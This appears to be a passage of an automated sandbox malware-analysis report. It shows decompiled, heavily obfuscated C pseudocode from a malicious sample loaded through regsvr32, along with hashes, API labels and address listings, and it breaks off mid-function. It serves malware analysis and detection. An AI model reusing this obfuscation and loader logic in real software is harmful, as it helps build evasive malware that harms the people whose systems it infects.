Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseFolderHandlePathService
String ID: #?($R.V;$eo?$fls
API String ID: 1899687250-3329392569
Opcode ID: cae3107f9a8ad6cecdd10e6ab34e2f717c292bd5c8cc3e3f0a907010325442b2
Instruction ID: 5d5dacac82f1fcbcc9612a754f4ecaffbc86000386717513c6f92e7e33ef97b3
Opcode Fuzzy Hash: cae3107f9a8ad6cecdd10e6ab34e2f717c292bd5c8cc3e3f0a907010325442b2
Instruction Fuzzy Hash: 07A121B15083428FC359DF24E58A51BBBE4FB94758F104E2EF0959A261C3B8DA4D8B93

Uniqueness

Uniqueness Score: -1.00%

Function 003C8ED3 Relevance: 4.0, Strings: 3, Instructions: 253
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E003C8ED3() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				void* _t230;
				signed int _t244;
				void* _t254;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t271;
				signed int _t272;
				signed int _t276;
				signed int _t277;
				signed int _t296;
				intOrPtr _t305;
				signed int _t307;
				void* _t310;
				void* _t312;

				_t262 = _v596;
				_t305 = 0;
				_v576 = 0x72cb8;
				_t307 = 0xea514;
				_v572 = 0;
				_v568 = 0;
				while(1) {
					L1:
					_t263 = 0x64;
					do {
						L2:
						while(_t307 != 0x15e9) {
							if(_t307 == 0x366e1) {
								_v612 = 0x9dde81;
								_v612 = _v612 >> 6;
								_v612 = _v612 / _t263;
								_v612 = _v612 ^ 0x000006d0;
								_v620 = 0x2b19ce;
								_v620 = _v620 | 0x455f4126;
								_t103 =  &_v620; // 0x455f4126
								_t266 = 0x6d;
								_v620 =  *_t103 / _t266;
								_t109 =  &_v620; // 0x455f4126
								_t267 = 0x3e;
								_v620 =  *_t109 * 0x55;
								_v620 = _v620 ^ 0x3631fd44;
								_v624 = 0xf6e7fe;
								_v624 = _v624 >> 0xc;
								_v624 = _v624 + 0x79ac;
								_v624 = _v624 + 0xffffaab2;
								_v624 = _v624 ^ 0x000033cf;
								_v596 = 0xf8ebdd;
								_v596 = _v596 ^ 0xa2f7f609;
								_v596 = _v596 ^ 0xa20ba338;
								_v604 = 0x586677;
								_t128 =  &_v604; // 0x586677
								_v604 =  *_t128 * 0x71;
								_v604 = _v604 >> 9;
								_v604 = _v604 ^ 0x0010e4f3;
								_v592 = 0xd601eb;
								_v592 = _v592 ^ 0x7d2fa772;
								_v592 = _v592 ^ 0x7dfa749f;
								_v608 = 0x45c38e;
								_v608 = _v608 ^ 0x04b0a915;
								_v608 = _v608 ^ 0x43ede7ac;
								_t268 = 0x13;
								_v608 = _v608 / _t267;
								_v608 = _v608 ^ 0x012228e2;
								_v600 = 0x72d29d;
								_v600 = _v600 + 0x4fee;
								_v600 = _v600 / _t268;
								_v600 = _v600 ^ 0x000cf7e6;
								_v616 = 0x882892;
								_t269 = 0x42;
								_v616 = _v616 / _t269;
								_v616 = _v616 >> 0xe;
								_v616 = _v616 | 0x67c3424b;
								_v616 = _v616 ^ 0x67cc75f5;
								_t296 = _v596;
								_t244 = E003C9A53(_v612, _t296,  &_v524, _v624, _v604, _v620, _v592, _t269, _v608, _t305, _t269, _v600, _v616); // executed
								_t262 = _t244;
								_t312 = _t312 + 0x2c;
								__eflags = _t262 - 0xffffffff;
								if(_t262 != 0xffffffff) {
									_t307 = 0x8e06a;
									while(1) {
										L1:
										_t263 = 0x64;
										goto L2;
									}
								}
							} else {
								if(_t307 == 0x8e06a) {
									_v616 = 0x29fa7d;
									_v616 = _v616 + 0xffff33db;
									_v616 = _v616 >> 0x10;
									_v616 = _v616 + 0x7dd9;
									_v616 = _v616 ^ 0x000000ba;
									_v620 = 0x36eb2;
									_v620 = _v620 << 0xb;
									_v620 = _v620 ^ 0x74709a5b;
									_v620 = _v620 ^ 0x6f0cc607;
									_v624 = 0xa16bb8;
									_t271 = 0x1f;
									_v624 = _v624 / _t271;
									_v624 = _v624 ^ 0xa360f7f5;
									_v624 = _v624 ^ 0xa3611842;
									E003C71EA(_v616, _t262, _v620,  &_v564, _v624);
									_v624 = 0x4deea5;
									_t312 = _t312 + 0x14;
									asm("sbb esi, esi");
									_v624 = _v624 + 0xd4dc;
									_v624 = _v624 | 0x3319833c;
									_v624 = _v624 ^ 0x33547a9f;
									_v612 = 0xbb9108;
									_t307 = (_t307 & 0x0007b7ea) + 0x60a66;
									_t272 = 0x45;
									_v612 = _v612 / _t272;
									_v612 = _v612 ^ 0x00031493;
									_t296 = _v624;
									E003D4FB8(_t262, _t296, _v612); // executed
									L16:
									_t263 = 0x64;
									goto L17;
								} else {
									if(_t307 == 0xda040) {
										_t254 = E003C8CDF();
										_t310 = _v588 - _v548;
										asm("sbb ecx, [esp+0x64]");
										__eflags = _v584 - _t296;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L22:
												_t305 = 1;
												__eflags = 1;
											} else {
												__eflags = _t310 - _t254;
												if(_t310 >= _t254) {
													goto L22;
												}
											}
										}
									} else {
										if(_t307 == 0xdc250) {
											_v620 = 0xe13012;
											_v620 = _v620 + 0xffffe593;
											_v620 = _v620 + 0xffff8fe3;
											_v620 = _v620 ^ 0x00e4fa2f;
											_v624 = 0xb70ea0;
											_v624 = _v624 + 0x818f;
											_t276 = 0x2f;
											_v624 = _v624 * 0x38;
											_v624 = _v624 ^ 0x282accf7;
											_v616 = 0x8edc80;
											_t277 = 0x6b;
											_v616 = _v616 / _t276;
											_v616 = _v616 >> 5;
											_v616 = _v616 / _t277;
											_v616 = _v616 ^ 0x000b9342;
											_t296 = _v624;
											E003CE9D9(_v620, _t296,  &_v588, _v616);
											_t307 = 0xda040;
											while(1) {
												L1:
												_t263 = 0x64;
												goto L2;
											}
										} else {
											if(_t307 != 0xea514) {
												goto L17;
											} else {
												_t307 = 0x15e9;
												continue;
											}
										}
									}
								}
							}
							L23:
							return _t305;
						}
						_v620 = 0xf9b872;
						_v620 = _v620 << 8;
						_v620 = _v620 ^ 0x881fc6c9;
						_v620 = _v620 >> 0xc;
						_v620 = _v620 ^ 0x000a803f;
						_v612 = 0x54b169;
						_t264 = 0x60;
						_v612 = _v612 / _t264;
						_v612 = _v612 + 0x7d3c;
						_v612 = _v612 ^ 0x000289eb;
						_v624 = 0x4ad207;
						_v624 = _v624 << 7;
						_v624 = _v624 >> 1;
						_t265 = 0x64;
						_v624 = _v624 / _t265;
						_v624 = _v624 ^ 0x0023afe1;
						_t230 = E003C2493(_t265,  &_v524, _v620, _v612, _v624);
						_t312 = _t312 + 0xc;
						__eflags = _t230;
						if(_t230 == 0) {
							_t307 = 0x60a66;
							goto L16;
						} else {
							_t307 = 0x366e1;
							goto L1;
						}
						goto L23;
						L17:
						__eflags = _t307 - 0x60a66;
					} while (_t307 != 0x60a66);
					goto L23;
				}
			}

0x003c8eda
0x003c8ee1
0x003c8ee3
0x003c8eeb
0x003c8ef0
0x003c8ef4
0x003c8efd
0x003c8efd
0x003c8eff
0x003c8f00
0x00000000
0x003c8f00
0x003c8f12
0x003c90c4
0x003c90ce
0x003c90db
0x003c90e1
0x003c90e9
0x003c90f1
0x003c90f9
0x003c90fd
0x003c9102
0x003c9108
0x003c910d
0x003c9110
0x003c9114
0x003c911c
0x003c9124
0x003c9129
0x003c9131
0x003c9139
0x003c9141
0x003c9149
0x003c9151
0x003c9159
0x003c9161
0x003c9166
0x003c916a
0x003c916f
0x003c9177
0x003c917f
0x003c9187
0x003c918f
0x003c9197
0x003c919f
0x003c91ad
0x003c91ae
0x003c91b4
0x003c91bc
0x003c91c4
0x003c91d4
0x003c91da
0x003c91e2
0x003c91ee
0x003c91f1
0x003c91f9
0x003c91fe
0x003c9206
0x003c922d
0x003c9236
0x003c923b
0x003c923d
0x003c9240
0x003c9243
0x003c9249
0x003c8efd
0x003c8efd
0x003c8eff
0x00000000
0x003c8eff
0x003c8efd
0x003c8f18
0x003c8f1e
0x003c8fe1
0x003c8feb
0x003c8ff3
0x003c8ff8
0x003c9000
0x003c9008
0x003c9010
0x003c9015
0x003c901d
0x003c9025
0x003c9033
0x003c9036
0x003c903e
0x003c9046
0x003c905c
0x003c9061
0x003c9069
0x003c906e
0x003c9070
0x003c9078
0x003c9082
0x003c9090
0x003c9098
0x003c90a0
0x003c90a5
0x003c90a9
0x003c90b5
0x003c90b9
0x003c92ec
0x003c92ee
0x00000000
0x003c8f24
0x003c8f2a
0x003c92f9
0x003c9302
0x003c930a
0x003c930e
0x003c9310
0x003c9312
0x003c9318
0x003c931a
0x003c931a
0x003c9314
0x003c9314
0x003c9316
0x00000000
0x00000000
0x003c9316
0x003c9312
0x003c8f30
0x003c8f36
0x003c8f4b
0x003c8f55
0x003c8f5d
0x003c8f65
0x003c8f6d
0x003c8f75
0x003c8f84
0x003c8f87
0x003c8f8b
0x003c8f93
0x003c8fa1
0x003c8fa2
0x003c8fa8
0x003c8fb3
0x003c8fbb
0x003c8fc7
0x003c8fd0
0x003c8fd7
0x003c8efd
0x003c8efd
0x003c8eff
0x00000000
0x003c8eff
0x003c8f38
0x003c8f3e
0x00000000
0x003c8f44
0x003c8f44
0x00000000
0x003c8f44
0x003c8f3e
0x003c8f36
0x003c8f2a
0x003c8f1e
0x003c931b
0x003c9327
0x003c9327
0x003c9253
0x003c925d
0x003c9262
0x003c926a
0x003c926f
0x003c9277
0x003c9285
0x003c928a
0x003c9290
0x003c9298
0x003c92a0
0x003c92a8
0x003c92ad
0x003c92b5
0x003c92bc
0x003c92c0
0x003c92d4
0x003c92d9
0x003c92dc
0x003c92de
0x003c92ea
0x00000000
0x003c92e0
0x003c92e0
0x00000000
0x003c92e0
0x00000000
0x003c92ef
0x003c92ef
0x003c92ef
0x00000000
0x003c92f7

Strings

&A_E, xrefs: 003C90F9
wfX, xrefs: 003C9161
<}, xrefs: 003C9290

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: &A_E$<}$wfX
API String ID: 2962429428-3652286388
Opcode ID: c1791b26b48296d6d89a7481fec850f5b677b5bf9e1f42e33e15636cf51e2b3f
Instruction ID: 3a199738b2bac79c9e2b824d96549197271fb73310823d01b7fad6ff5602a486
Opcode Fuzzy Hash: c1791b26b48296d6d89a7481fec850f5b677b5bf9e1f42e33e15636cf51e2b3f
Instruction Fuzzy Hash: 12B1587290C3019FD308CF25D48990BBBE2BBD8758F11891EF4D5AA260D7B5CA498F87

Uniqueness

Uniqueness Score: -1.00%

Function 003DFADC Relevance: 3.9, Strings: 3, Instructions: 184
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E003DFADC() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				void* _t163;
				signed int _t170;
				void* _t176;
				intOrPtr _t180;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				intOrPtr _t211;
				intOrPtr _t214;
				signed int* _t217;

				_t217 =  &_v1072;
				_v1056 = 0x196d7;
				_t214 = 0;
				_v1052 = 0xd9150;
				_v1048 = 0x2eb44;
				_t163 = 0x933a0;
				_v1044 = 0;
				do {
					while(_t163 != 0x20e7a) {
						if(_t163 == 0x933a0) {
							_t163 = 0xc3fa3;
							continue;
						} else {
							if(_t163 == 0xac68d) {
								_v1072 = 0x6c381e;
								_v1072 = _v1072 + 0x1cf1;
								_v1072 = _v1072 * 0x56;
								_v1072 = _v1072 | 0xa3762362;
								_v1072 = _v1072 ^ 0xa773b401;
								_v1064 = 0x5ca78c;
								_v1064 = _v1064 >> 0xf;
								_v1064 = _v1064 ^ 0x0006ccf1;
								_t170 = E003C3F40( &_v1040, __eflags,  &_v520, _v1064); // executed
								__eflags = _t170;
								_t163 = 0x20e7a;
								_t214 =  !=  ? 1 : _t214;
								continue;
							} else {
								if(_t163 == 0xc3fa3) {
									_v1072 = 0x88b19b;
									_v1072 = _v1072 + 0xffff9f73;
									_t195 = 0x3e;
									_v1072 = _v1072 / _t195;
									_v1072 = _v1072 + 0xffff3dfc;
									_v1072 = _v1072 ^ 0x0006470b;
									_v1068 = 0x45464c;
									_v1068 = _v1068 | 0xc4257076;
									_t196 = 0x19;
									_v1068 = _v1068 / _t196;
									_v1068 = _v1068 ^ 0x07d8d64d;
									_v1064 = 0x1d94b5;
									_v1064 = _v1064 + 0xffff8ae7;
									_v1064 = _v1064 ^ 0x001148f3;
									E003C2493(_t196,  &_v520, _v1072, _v1068, _v1064);
									_t217 =  &(_t217[3]);
									_t163 = 0xf4342;
									continue;
								} else {
									_t224 = _t163 - 0xf4342;
									if(_t163 == 0xf4342) {
										_v1064 = 0xa6289b;
										_v1064 = _v1064 + 0xffffb572;
										_v1064 = _v1064 ^ 0x00ad6cf6;
										_v1068 = 0xca6d1c;
										_v1068 = _v1068 << 0x10;
										_v1068 = _v1068 | 0x641fb9fe;
										_v1068 = _v1068 ^ 0x6d185064;
										_v1072 = 0x21e431;
										_v1072 = _v1072 ^ 0xb0638b90;
										_v1072 = _v1072 >> 7;
										_v1072 = _v1072 ^ 0x01693e4d;
										_v1060 = 0xd52fa5;
										_v1060 = _v1060 | 0x16d32210;
										_v1060 = _v1060 ^ 0x16d600b5;
										_t176 = E003CD933(_v1064, _v1068, 0x3c1000, _v1072, _v1060);
										_v1072 = 0x218efc;
										_v1072 = _v1072 >> 9;
										_v1072 = _v1072 ^ 0xaee0ac4e;
										_v1072 = _v1072 ^ 0xaee91287;
										_v1060 = 0x6f5a6c;
										_v1060 = _v1060 ^ 0xfb918608;
										_v1060 = _v1060 ^ 0xfbf0bd54;
										_v1068 = 0x8185a7;
										_v1068 = _v1068 + 0xffff378a;
										_v1068 = _v1068 ^ 0xc6894228;
										_v1068 = _v1068 ^ 0xc604118a;
										_v1064 = 0xda9250;
										_t198 = 0x4b;
										_v1064 = _v1064 / _t198;
										_v1064 = _v1064 ^ 0x000e5d50;
										_t180 =  *0x3e2208; // 0x28e510
										_t211 =  *0x3e2208; // 0x28e510
										_t66 = _t211 + 0x1c; // 0x3a0043
										E003D0E90(_t66, _t224, _t198, _v1060, _v1068, _t180 + 0x22c,  &_v1040, _v1064, _t176);
										_v1060 = 0x39fa4b;
										_v1060 = _v1060 << 8;
										_v1060 = _v1060 ^ 0x39f3b0a8;
										_v1064 = 0x9e6588;
										_v1064 = _v1064 * 0x7f;
										_v1064 = _v1064 ^ 0x4e9e7686;
										_v1068 = 0xd0a3df;
										_v1068 = _v1068 | 0xdb19c1d8;
										_v1068 = _v1068 * 0x4f;
										_v1068 = _v1068 ^ 0xd83319e5;
										E003C43D3(_v1060, _v1064, _v1068, _t176);
										_t217 =  &(_t217[0xc]);
										_t163 = 0xac68d;
										continue;
									}
								}
							}
						}
						goto L11;
					}
					_v1068 = 0xf601e4;
					_v1068 = _v1068 + 0x4915;
					_v1068 = _v1068 + 0xffffdfa6;
					_v1068 = _v1068 ^ 0x00f16c76;
					_v1072 = 0x8ca88b;
					_v1072 = _v1072 << 4;
					_v1072 = _v1072 | 0xa531821c;
					_v1072 = _v1072 * 0x7b;
					_v1072 = _v1072 ^ 0x97da4951;
					_v1064 = 0xca405e;
					_v1064 = _v1064 + 0x9ae2;
					_t158 =  &_v1064;
					 *_t158 = _v1064 ^ 0x00c02ef2;
					__eflags =  *_t158;
					E003D7A53(_v1068, _v1072,  *_t158,  &_v1040, _v1064); // executed
					_t163 = 0xa778b;
					L11:
					__eflags = _t163 - 0xa778b;
				} while (__eflags != 0);
				return _t214;
			}

0x003dfadc
0x003dfae6
0x003dfaee
0x003dfaf5
0x003dfafd
0x003dfb05
0x003dfb07
0x003dfb10
0x003dfb10
0x003dfb1d
0x003dfdda
0x00000000
0x003dfb23
0x003dfb28
0x003dfd6f
0x003dfd7b
0x003dfd88
0x003dfd93
0x003dfd9b
0x003dfda3
0x003dfdab
0x003dfdb0
0x003dfdc1
0x003dfdcb
0x003dfdcd
0x003dfdd2
0x00000000
0x003dfb2e
0x003dfb30
0x003dfcdc
0x003dfce6
0x003dfcf4
0x003dfcf9
0x003dfcff
0x003dfd07
0x003dfd0f
0x003dfd17
0x003dfd23
0x003dfd2d
0x003dfd31
0x003dfd39
0x003dfd41
0x003dfd49
0x003dfd5d
0x003dfd62
0x003dfd65
0x00000000
0x003dfb36
0x003dfb36
0x003dfb3b
0x003dfb41
0x003dfb49
0x003dfb51
0x003dfb59
0x003dfb61
0x003dfb66
0x003dfb6e
0x003dfb76
0x003dfb7e
0x003dfb86
0x003dfb8b
0x003dfb93
0x003dfb9b
0x003dfba3
0x003dfbc0
0x003dfbc5
0x003dfbd0
0x003dfbd7
0x003dfbe1
0x003dfbe9
0x003dfbf1
0x003dfbf9
0x003dfc01
0x003dfc09
0x003dfc11
0x003dfc19
0x003dfc23
0x003dfc2f
0x003dfc33
0x003dfc3b
0x003dfc48
0x003dfc5b
0x003dfc66
0x003dfc69
0x003dfc6e
0x003dfc76
0x003dfc7b
0x003dfc83
0x003dfc91
0x003dfc95
0x003dfc9d
0x003dfca5
0x003dfcb2
0x003dfcb6
0x003dfcca
0x003dfccf
0x003dfcd2
0x00000000
0x003dfcd2
0x003dfb3b
0x003dfb30
0x003dfb28
0x00000000
0x003dfb1d
0x003dfde1
0x003dfde9
0x003dfdf1
0x003dfdf9
0x003dfe01
0x003dfe09
0x003dfe0e
0x003dfe1b
0x003dfe23
0x003dfe2b
0x003dfe33
0x003dfe3b
0x003dfe3b
0x003dfe3b
0x003dfe50
0x003dfe57
0x003dfe5c
0x003dfe5c
0x003dfe5c
0x003dfe73

Strings

1!, xrefs: 003DFB76
LFE, xrefs: 003DFD0F
lZo, xrefs: 003DFBE9

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 1!$LFE$lZo
API String ID: 0-2301262926
Opcode ID: 50c9714690d325e0d6ff47714591ff2a496b1eea38ccf524518c27f10d5ff51b
Instruction ID: 8cd28cafde124076ad89d83189794d0d99d03d95cc37b76b571e7d1eea9a9f18
Opcode Fuzzy Hash: 50c9714690d325e0d6ff47714591ff2a496b1eea38ccf524518c27f10d5ff51b
Instruction Fuzzy Hash: 939114B11093429FC349CF25E98990BBBE1FBD0758F504D2EF5929A261D3B4CA4D8B93

Uniqueness

Uniqueness Score: -1.00%

Function 003D8BA1 Relevance: 3.9, Strings: 3, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4i~Q, xrefs: 003D8E1E
#|, xrefs: 003D8CE5
-<, xrefs: 003D8C84

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: -<$4i~Q$#|
API String ID: 963392458-2320829920
Opcode ID: 82418c1b125578716308b8af601ee24ebca697ec5cda3df244d4a7122db685a5
Instruction ID: d311b10604c1cc61e70c8f8c9e12ab38a9ab5568f1a41dcc9b2591c4c143b19d
Opcode Fuzzy Hash: 82418c1b125578716308b8af601ee24ebca697ec5cda3df244d4a7122db685a5
Instruction Fuzzy Hash: BD811172D0020DEBCF09CFA5D94A9DEBBB1FB44304F20819AE511BA260D7B55B45DF80

Uniqueness

Uniqueness Score: -1.00%

Function 003C3F40 Relevance: 2.7, Strings: 2, Instructions: 186
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E003C3F40(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v52;
				char* _v56;
				char* _v60;
				intOrPtr _v64;
				char _v68;
				char _v588;
				char _v1108;
				void* __ecx;
				void* _t206;
				signed int _t240;
				void* _t244;
				signed int _t245;
				signed int _t246;
				signed int _t249;
				signed int _t250;
				signed int _t253;
				signed int _t254;
				void* _t277;

				_push(_a8);
				_t277 = __edx;
				_push(_a4);
				_push(__edx);
				E003C2528(_t206);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x9739b;
				_v32 = 0x53132;
				_v16 = 0x69641;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x00035243;
				_v12 = 0xa4f9b1;
				_v12 = _v12 * 0x71;
				_v12 = _v12 ^ 0x48ddc857;
				_push(_v12);
				_push( &_v68);
				_t244 = 0x1e;
				E003D2AEF(_t244, _v16);
				_v8 = 0x259fc;
				_v8 = _v8 | 0xb05a079a;
				_v8 = _v8 + 0x8ef8;
				_t245 = 0x5b;
				_v8 = _v8 / _t245;
				_v8 = _v8 ^ 0x01f42abb;
				_v12 = 0x22c6ae;
				_v12 = _v12 | 0x53cd552a;
				_t246 = 0x3d;
				_v12 = _v12 / _t246;
				_v12 = _v12 ^ 0x01652d18;
				E003D2AEF(0x208, _v8,  &_v588, _v12);
				_v12 = 0xfa956f;
				_v12 = _v12 | 0x9f80165a;
				_v12 = _v12 ^ 0x9ff566f3;
				_v8 = 0x65df77;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0xc5d86d98;
				_v8 = _v8 | 0x852d94cb;
				_v8 = _v8 ^ 0xc5f5ecd1;
				E003D2AEF(0x208, _v12,  &_v1108, _v8);
				_v16 = 0xa21bd0;
				_t249 = 0x66;
				_v16 = _v16 / _t249;
				_v16 = _v16 ^ 0x000594ab;
				_v12 = 0x75eaf4;
				_t250 = 0x5c;
				_v12 = _v12 / _t250;
				_v12 = _v12 + 0xe508;
				_v12 = _v12 ^ 0x000ab3d8;
				_v8 = 0x509377;
				_v8 = _v8 << 2;
				_v8 = _v8 | 0x65080f39;
				_v8 = _v8 + 0xcc8b;
				_v8 = _v8 ^ 0x65497155;
				_t97 =  &_v8; // 0x65497155
				E003C2529(_v16, _a4,  &_v588, _v12,  *_t97);
				_v8 = 0xc45ece;
				_v8 = _v8 | 0x5f8e4fd2;
				_v8 = _v8 ^ 0x7ef0b75f;
				_v8 = _v8 + 0xffff29b6;
				_v8 = _v8 ^ 0x2135e235;
				_v12 = 0xdcf250;
				_v12 = _v12 + 0x162c;
				_v12 = _v12 * 0x21;
				_v12 = _v12 ^ 0x1c7a260b;
				_v16 = 0xcb704f;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x0004b952;
				E003C2529(_v8, _t277,  &_v1108, _v12, _v16);
				_v64 = 1;
				_v60 =  &_v588;
				_v56 =  &_v1108;
				_v12 = 0xf859ff;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xffff0e0d;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x0007f9ed;
				_v16 = 0x6f06be;
				_v16 = _v16 + 0x1436;
				_v16 = _v16 + 0xe138;
				_v16 = _v16 | 0x7b5a924e;
				_v16 = _v16 ^ 0x7b7ffe7e;
				_v20 = 0xb6e8e7;
				_t253 = 0x60;
				_v20 = _v20 / _t253;
				_v20 = _v20 ^ 0x0001efc2;
				_v8 = 0xd98b4e;
				_v8 = _v8 | 0xcb8d5ef4;
				_v8 = _v8 ^ 0xda3f2c5f;
				_v8 = _v8 | 0x8b5b92f2;
				_v8 = _v8 ^ 0x9bfbf7f3;
				_v52 = _v8 | _v20 | _v16 | _v12;
				_v8 = 0x18694;
				_v8 = _v8 + 0xffff95d6;
				_v8 = _v8 >> 0x10;
				_t254 = 0x74;
				_v8 = _v8 * 0x2c;
				_v8 = _v8 ^ 0x00051939;
				_v16 = 0x34716a;
				_v16 = _v16 * 0x49;
				_v16 = _v16 / _t254;
				_v16 = _v16 ^ 0x8a90058d;
				_v16 = _v16 ^ 0x8ab4125e;
				_v12 = 0x183527;
				_v12 = _v12 ^ 0xaa08eb33;
				_v12 = _v12 + 0xfffffc26;
				_v12 = _v12 + 0xfffffa2b;
				_v12 = _v12 ^ 0xaa1ac33e;
				_t240 = E003C3182(_v8,  &_v68, _v16, _v12); // executed
				asm("sbb eax, eax");
				return  ~_t240 + 1;
			}

0x003c3f4a
0x003c3f4d
0x003c3f4f
0x003c3f52
0x003c3f54
0x003c3f59
0x003c3f5d
0x003c3f61
0x003c3f68
0x003c3f6f
0x003c3f76
0x003c3f7a
0x003c3f81
0x003c3f8c
0x003c3f92
0x003c3f99
0x003c3f9f
0x003c3fa2
0x003c3fa3
0x003c3fa8
0x003c3fb1
0x003c3fb8
0x003c3fc4
0x003c3fc9
0x003c3fce
0x003c3fd5
0x003c3fdc
0x003c3fe6
0x003c3fee
0x003c3ff7
0x003c4005
0x003c400a
0x003c4017
0x003c4023
0x003c402a
0x003c4031
0x003c4035
0x003c403c
0x003c4043
0x003c4051
0x003c4056
0x003c4064
0x003c4069
0x003c406e
0x003c4075
0x003c407f
0x003c4082
0x003c4085
0x003c408c
0x003c409c
0x003c40a3
0x003c40a7
0x003c40ae
0x003c40b5
0x003c40bc
0x003c40c6
0x003c40cb
0x003c40d4
0x003c40db
0x003c40e2
0x003c40e9
0x003c40f0
0x003c40f7
0x003c4102
0x003c410b
0x003c4112
0x003c4119
0x003c411d
0x003c412e
0x003c4133
0x003c4140
0x003c414e
0x003c4151
0x003c4158
0x003c415c
0x003c4163
0x003c4167
0x003c416e
0x003c4175
0x003c417c
0x003c4183
0x003c418a
0x003c4191
0x003c419d
0x003c41a2
0x003c41a7
0x003c41ae
0x003c41b5
0x003c41bc
0x003c41c3
0x003c41ca
0x003c41dd
0x003c41e1
0x003c41e8
0x003c41ef
0x003c41f7
0x003c41f8
0x003c41fb
0x003c4202
0x003c420d
0x003c4215
0x003c4218
0x003c4222
0x003c4229
0x003c4230
0x003c4237
0x003c423e
0x003c4245
0x003c4255
0x003c425e
0x003c4265

Strings

jq4, xrefs: 003C4202
UqIe, xrefs: 003C40BC

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: UqIe$jq4
API String ID: 3080627654-922652752
Opcode ID: 3aba1a5dc67be0cba1096144d0cf4ca39a3c572ba0510f3c4a1627e8026a0101
Instruction ID: a565c0288bbe18ac14a4e1bc0fa3a862adb9287689fbd912ef81345b689a9355
Opcode Fuzzy Hash: 3aba1a5dc67be0cba1096144d0cf4ca39a3c572ba0510f3c4a1627e8026a0101
Instruction Fuzzy Hash: E191CEB6D0120CEBDB18CFE1D98A9CEBBB2FB44314F20C199D515AA264D7B85B85DF40

Uniqueness

Uniqueness Score: -1.00%

Function 003D7A53 Relevance: 2.6, Strings: 2, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E003D7A53(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v548;
				void* _t109;
				void* _t113;
				void* _t121;
				signed int _t123;
				signed int _t128;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t109);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x821e0;
				_v8 = 0xa153da;
				_v8 = _v8 | 0xcacf1ee2;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x001adac1;
				_v12 = 0x663578;
				_t123 = 0x7c;
				_v12 = _v12 / _t123;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 ^ 0x000f51ae;
				_v20 = 0xc8f132;
				_v20 = _v20 >> 2;
				_v20 = _v20 + 0xffff73e2;
				_v20 = _v20 + 0xffffaead;
				_v20 = _v20 ^ 0x0033b5c5;
				_v16 = 0xa0db65;
				_v16 = _v16 ^ 0xe1934d71;
				_v16 = _v16 >> 7;
